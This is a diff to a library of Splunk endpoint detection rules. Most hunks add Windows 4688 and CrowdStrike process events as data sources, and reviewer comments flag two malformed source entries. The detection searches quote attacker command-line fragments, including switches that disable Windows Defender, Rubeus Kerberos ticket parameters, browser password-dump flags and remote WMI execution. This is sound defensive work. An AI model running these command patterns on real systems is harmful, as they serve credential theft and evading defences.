--- a/detections/endpoint/possible_browser_pass_view_parameter.yml
+++ b/detections/endpoint/possible_browser_pass_view_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes with command-line param
and data breaches.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*/stext
*", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*",
diff --git a/detections/endpoint/possible_lateral_movement_powershell_spawn.yml b/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
index 6b3a5242d9..9b3db5f4ae 100644
--- a/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
+++ b/detections/endpoint/possible_lateral_movement_powershell_spawn.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the spawning of a PowerShell proces
or persist within the environment.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe
OR Processes.parent_process_name=services.exe OR Processes.parent_process_name=svchost.exe
diff --git a/detections/endpoint/potentially_malicious_code_on_commandline.yml b/detections/endpoint/potentially_malicious_code_on_commandline.yml
index 1f8cb8a562..cc2bb36f5b 100644
--- a/detections/endpoint/potentially_malicious_code_on_commandline.yml
+++ b/detections/endpoint/potentially_malicious_code_on_commandline.yml
@@ -16,6 +16,8 @@ description: The following analytic detects potentially malicious command lines
system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel="Endpoint.Processes" by Processes.parent_process_name
Processes.process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name(Processes)` |
diff --git a/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml b/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
index 9f971e9dbb..410de1915b 100644
--- a/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
+++ b/detections/endpoint/powershell___connect_to_internet_with_hidden_window.yml
@@ -16,6 +16,8 @@ description: The following analytic detects PowerShell commands using the Window
endpoint.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user
Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/powershell_disable_security_monitoring.yml b/detections/endpoint/powershell_disable_security_monitoring.yml
index 55118a87a7..1cf9ea9210 100644
--- a/detections/endpoint/powershell_disable_security_monitoring.yml
+++ b/detections/endpoint/powershell_disable_security_monitoring.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies attempts to disable Windows Defen
exfiltration, further system compromise, or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process="*set-mppreference*"
AND Processes.process IN ("*disablerealtimemonitoring*","*disableioavprotection*","*disableintrusionpreventionsystem*","*disablescriptscanning*","*disableblockatfirstseen*","*DisableBehaviorMonitoring*","*drtm
diff --git a/detections/endpoint/powershell_get_localgroup_discovery.yml b/detections/endpoint/powershell_get_localgroup_discovery.yml
index 91b4f01e8e..233a46805d 100644
--- a/detections/endpoint/powershell_get_localgroup_discovery.yml
+++ b/detections/endpoint/powershell_get_localgroup_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the `get-localgroup` c
potentially leading to unauthorized access and control over the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe
OR Processes.process_name=cmd.exe) (Processes.process="*get-localgroup*") by Processes.dest
diff --git a/detections/endpoint/powershell_start_bitstransfer.yml b/detections/endpoint/powershell_start_bitstransfer.yml
index f919c87e47..d41e79cdbf 100644
--- a/detections/endpoint/powershell_start_bitstransfer.yml
+++ b/detections/endpoint/powershell_start_bitstransfer.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the PowerShell comm
and potentially leading to further exploitation of the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*start-bitstransfer*
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml b/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
index aee3326249..f88b6c2c0a 100644
--- a/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
+++ b/detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "bcdedit.exe" with
leading to further damage.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "bcdedit.exe"
Processes.process = "*bootstatuspolicy*" Processes.process = "*ignoreallfailures*"
diff --git a/detections/endpoint/print_processor_registry_autostart.yml b/detections/endpoint/print_processor_registry_autostart.yml
index 1ed17ebb5e..489f58f2e0 100644
--- a/detections/endpoint/print_processor_registry_autostart.yml
+++ b/detections/endpoint/print_processor_registry_autostart.yml
@@ -13,7 +13,7 @@ description: The following analytic detects suspicious modifications or new entr
this could allow an attacker to execute a malicious DLL payload by restarting the
spoolsv.exe process, leading to potential control over the compromised machine.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime
max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml b/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
index 2703fd9a24..db3d11faae 100644
--- a/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
+++ b/detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml
@@ -13,7 +13,7 @@ description: The following analytic detects a process creating a `.lnk` file in
If confirmed malicious, this could allow an attacker to maintain persistence, execute
arbitrary code, or further compromise the system.
data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11 AND Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk"
AND (Filesystem.file_path="C:\\Users\\*" OR Filesystem.file_path="*\\Temp\\*") by
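Review bot: The new `- Sysmon EventID 11 AND Sysmon EventID 1` entry packs two data sources into a single list item, while every other `data_source` list in this commit uses one source per item; if contentctl resolves these strings against the `name` values under `data_sources/`, a combined string would match nothing. Split it into `- Sysmon EventID 11` and `- Sysmon EventID 1`. The same applies to `- Sysmon EventID 1 AND Sysmon EventID 11` in the process_writing_dynamicwrapperx.yml hunk. The search scalar continues outside the hunk.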
diff --git a/detections/endpoint/process_deleting_its_process_file_path.yml b/detections/endpoint/process_deleting_its_process_file_path.yml
index 7a5942249f..afd82714e3 100644
--- a/detections/endpoint/process_deleting_its_process_file_path.yml
+++ b/detections/endpoint/process_deleting_its_process_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a process attempting to delete it
remediation efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`sysmon` EventCode=1 CommandLine = "* /c *" CommandLine = "* del*" Image
= "*\\cmd.exe" | eval result = if(like(process,"%".parent_process."%"), "Found",
"Not Found") | stats min(_time) as firstTime max(_time) as lastTime count by dest
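Review bot: The added `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2` entries do not describe this search, which is bound to `` `sysmon` EventCode=1 `` on raw events rather than to `datamodel=Endpoint.Processes`, so events from those two sources can never satisfy it. Either keep `data_source` at `- Sysmon EventID 1` only, or rewrite the search over the `Endpoint.Processes` data model as the neighbouring detections do so that the declared sources are actually consumed. The search scalar continues outside the hunk.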
diff --git a/detections/endpoint/process_execution_via_wmi.yml b/detections/endpoint/process_execution_via_wmi.yml
index 7516cc6bb5..3fe30bde40 100644
--- a/detections/endpoint/process_execution_via_wmi.yml
+++ b/detections/endpoint/process_execution_via_wmi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a process by `WmiPr
or network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=WmiPrvSE.exe
NOT (Processes.process IN ("*\\dismhost.exe*")) by Processes.dest Processes.user
diff --git a/detections/endpoint/process_kill_base_on_file_path.yml b/detections/endpoint/process_kill_base_on_file_path.yml
index d29dacb881..21e767e52b 100644
--- a/detections/endpoint/process_kill_base_on_file_path.yml
+++ b/detections/endpoint/process_kill_base_on_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `wmic.exe` with the `dele
and persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` AND Processes.process="*process*"
diff --git a/detections/endpoint/process_writing_dynamicwrapperx.yml b/detections/endpoint/process_writing_dynamicwrapperx.yml
index f73f8a86b5..ba6276e497 100644
--- a/detections/endpoint/process_writing_dynamicwrapperx.yml
+++ b/detections/endpoint/process_writing_dynamicwrapperx.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a process writing the dynwrapx.dll f
code, escalate privileges, or maintain persistence within the environment. Immediate
investigation of parallel processes and registry modifications is recommended.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid
Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats
diff --git a/detections/endpoint/processes_launching_netsh.yml b/detections/endpoint/processes_launching_netsh.yml
index 9d7abc4478..55d09e45ac 100644
--- a/detections/endpoint/processes_launching_netsh.yml
+++ b/detections/endpoint/processes_launching_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes launching netsh.exe, a
threat to the network's integrity and security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_netsh` by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml b/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
index efef3925a2..d54e914328 100644
--- a/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
+++ b/detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a batch command des
efforts, severely impacting business operations.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*/c* Processes.process="*
rd *" Processes.process="*/s*" Processes.process="*/q*" by Processes.user Processes.process_name
diff --git a/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml b/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
index 9a02f7a22d..4a899f456e 100644
--- a/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
+++ b/detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of reg.exe to modify registr
system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name)
as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes
diff --git a/detections/endpoint/registry_keys_for_creating_shim_databases.yml b/detections/endpoint/registry_keys_for_creating_shim_databases.yml
index 366ca03465..8fcb18edc5 100644
--- a/detections/endpoint/registry_keys_for_creating_shim_databases.yml
+++ b/detections/endpoint/registry_keys_for_creating_shim_databases.yml
@@ -14,7 +14,7 @@ description: The following analytic detects registry activity related to the cre
manipulate application behavior, posing a severe risk to the integrity and security
of the affected systems.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB*)
diff --git a/detections/endpoint/registry_keys_used_for_persistence.yml b/detections/endpoint/registry_keys_used_for_persistence.yml
index c627f41d35..9c70a13351 100644
--- a/detections/endpoint/registry_keys_used_for_persistence.yml
+++ b/detections/endpoint/registry_keys_used_for_persistence.yml
@@ -15,7 +15,7 @@ description: The following analytic identifies modifications to registry keys co
control over compromised systems, posing a severe threat to system integrity and
security.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce
diff --git a/detections/endpoint/registry_keys_used_for_privilege_escalation.yml b/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
index f04259902b..f040e11561 100644
--- a/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
+++ b/detections/endpoint/registry_keys_used_for_privilege_escalation.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to registry keys under
attackers to execute arbitrary code with elevated privileges, leading to potential
system compromise and persistent access.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE ((Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File
diff --git a/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml b/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
index 9694429dc7..818f60890d 100644
--- a/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
+++ b/detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the loading of a DLL using the regsv
arbitrary code, maintain persistence, and further compromise the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` AND Processes.process="*/i*"
by Processes.dest Processes.parent_process Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml b/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
index fca732291a..ef55514830 100644
--- a/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
+++ b/detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of Regsvr32.exe with t
isolation are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` by Processes.user
Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/remcos_client_registry_install_entry.yml b/detections/endpoint/remcos_client_registry_install_entry.yml
index a85fb22e64..284c4f7e56 100644
--- a/detections/endpoint/remcos_client_registry_install_entry.yml
+++ b/detections/endpoint/remcos_client_registry_install_entry.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the presence of a registry key associated with the Remcos RAT agent on a host. It leverages data from the Endpoint.Processes and Endpoint.Registry data models in Splunk, focusing on instances where the "license" key is found in the "Software\Remcos" path. This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration. If confirmed malicious, the attacker could gain control over the system, steal sensitive information, or use the compromised host for further attacks. Immediate investigation and remediation are required.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/remote_desktop_process_running_on_system.yml b/detections/endpoint/remote_desktop_process_running_on_system.yml
index b5a0af8292..0811121698 100644
--- a/detections/endpoint/remote_desktop_process_running_on_system.yml
+++ b/detections/endpoint/remote_desktop_process_running_on_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the remote desktop
network compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe
AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user
diff --git a/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
index 8dc4550c8c..14db3eb4de 100644
--- a/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Document.ActiveView.ExecuteShellCommand*"
OR Processes.process="*Document.Application.ShellExecute*") by Processes.dest Processes.user
diff --git a/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
index af56428100..ee7a0dbcfc 100644
--- a/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
and lateral spread within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-Command*"
AND Processes.process="*-ComputerName*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml b/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
index dc49246063..28bf4680c7 100644
--- a/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
+++ b/detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `winrs.exe` with co
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=winrs.exe
OR Processes.original_file_name=winrs.exe) (Processes.process="*-r:*" OR Processes.process="*-remote:*")
diff --git a/detections/endpoint/remote_process_instantiation_via_wmi.yml b/detections/endpoint/remote_process_instantiation_via_wmi.yml
index 7c4474df53..f2a87b8c6a 100644
--- a/detections/endpoint/remote_process_instantiation_via_wmi.yml
+++ b/detections/endpoint/remote_process_instantiation_via_wmi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of wmic.exe with param
lateral spread within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process="*/node:*"
AND Processes.process="*process*" AND Processes.process="*call*" AND Processes.process="*create*")
diff --git a/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml b/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
index 66811ce7f8..ca63658762 100644
--- a/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
+++ b/detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `powershell.exe` us
leading to further compromise and persistence within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-WmiMethod*"
AND Processes.process="*-CN*" AND Processes.process="*-Class Win32_Process*" AND Processes.process="*-Name
diff --git a/detections/endpoint/remote_system_discovery_with_dsquery.yml b/detections/endpoint/remote_system_discovery_with_dsquery.yml
index bf994244b3..6c05bd96af 100644
--- a/detections/endpoint/remote_system_discovery_with_dsquery.yml
+++ b/detections/endpoint/remote_system_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `dsquery.exe` with
access to critical systems within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe")
(Processes.process="*computer*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/remote_system_discovery_with_net.yml b/detections/endpoint/remote_system_discovery_with_net.yml
index d77e2c716b..fe77a7dcf4 100644
--- a/detections/endpoint/remote_system_discovery_with_net.yml
+++ b/detections/endpoint/remote_system_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
or lateral movement within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
OR Processes.process_name="net1.exe") (Processes.process="*domain computers*" AND
diff --git a/detections/endpoint/remote_system_discovery_with_wmic.yml b/detections/endpoint/remote_system_discovery_with_wmic.yml
index 5615606282..6f0debeedd 100644
--- a/detections/endpoint/remote_system_discovery_with_wmic.yml
+++ b/detections/endpoint/remote_system_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with spe
leading to unauthorized access and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
(Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_computer*
diff --git a/detections/endpoint/remote_wmi_command_attempt.yml b/detections/endpoint/remote_wmi_command_attempt.yml
index ce1fd3e8a3..ad4cc1dc12 100644
--- a/detections/endpoint/remote_wmi_command_attempt.yml
+++ b/detections/endpoint/remote_wmi_command_attempt.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `wmic.exe` with the
arbitrary commands, and potentially escalate privileges or persist within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process=*node*
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/resize_shadowstorage_volume.yml b/detections/endpoint/resize_shadowstorage_volume.yml
index 1ac224b41a..07215402da 100644
--- a/detections/endpoint/resize_shadowstorage_volume.yml
+++ b/detections/endpoint/resize_shadowstorage_volume.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the resizing of shadow storage vo
and increasing the potential for data loss.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
values(Processes.parent_process_name) as parent_process values(Processes.process_name)
as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/revil_common_exec_parameter.yml b/detections/endpoint/revil_common_exec_parameter.yml
index bfef1d8320..0c6bc248ad 100644
--- a/detections/endpoint/revil_common_exec_parameter.yml
+++ b/detections/endpoint/revil_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of command-line parame
inaccessible and potentially causing significant operational disruption.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "* -nolan
*" OR Processes.process = "* -nolocal *" OR Processes.process = "* -fast *" OR Processes.process
diff --git a/detections/endpoint/revil_registry_entry.yml b/detections/endpoint/revil_registry_entry.yml
index 82977a8971..21ccf24d35 100644
--- a/detections/endpoint/revil_registry_entry.yml
+++ b/detections/endpoint/revil_registry_entry.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies suspicious modifications in the r
information on compromised hosts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/rubeus_command_line_parameters.yml b/detections/endpoint/rubeus_command_line_parameters.yml
index b091b3a554..24bb8f5c65 100644
--- a/detections/endpoint/rubeus_command_line_parameters.yml
+++ b/detections/endpoint/rubeus_command_line_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Rubeus command line param
sensitive information within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*ptt /ticket*"
OR Processes.process = "* monitor /interval*" OR Processes.process ="* asktgt* /user:*"
diff --git a/detections/endpoint/runas_execution_in_commandline.yml b/detections/endpoint/runas_execution_in_commandline.yml
index 5325220d71..59fcb501df 100644
--- a/detections/endpoint/runas_execution_in_commandline.yml
+++ b/detections/endpoint/runas_execution_in_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the runas.exe proce
target host.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_runas` AND Processes.process
= "*/user:*" AND Processes.process = "*admin*" by Processes.dest Processes.user
diff --git a/detections/endpoint/rundll32_control_rundll_hunt.yml b/detections/endpoint/rundll32_control_rundll_hunt.yml
index 48b89e8052..2415080e37 100644
--- a/detections/endpoint/rundll32_control_rundll_hunt.yml
+++ b/detections/endpoint/rundll32_control_rundll_hunt.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances of rundll32.exe executi
persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL* by
Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml b/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
index 553eb513a4..951b4f5ea3 100644
--- a/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
+++ b/detections/endpoint/rundll32_control_rundll_world_writable_directory.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe with t
escalation, or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*Control_RunDLL*
AND Processes.process IN ("*\\appdata\\*", "*\\windows\\temp\\*", "*\\programdata\\*") by
diff --git a/detections/endpoint/rundll32_lockworkstation.yml b/detections/endpoint/rundll32_lockworkstation.yml
index 72b774ccfa..a4330ce22e 100644
--- a/detections/endpoint/rundll32_lockworkstation.yml
+++ b/detections/endpoint/rundll32_lockworkstation.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the rundll32.exe co
could indicate an attempt to evade detection and hinder incident response efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
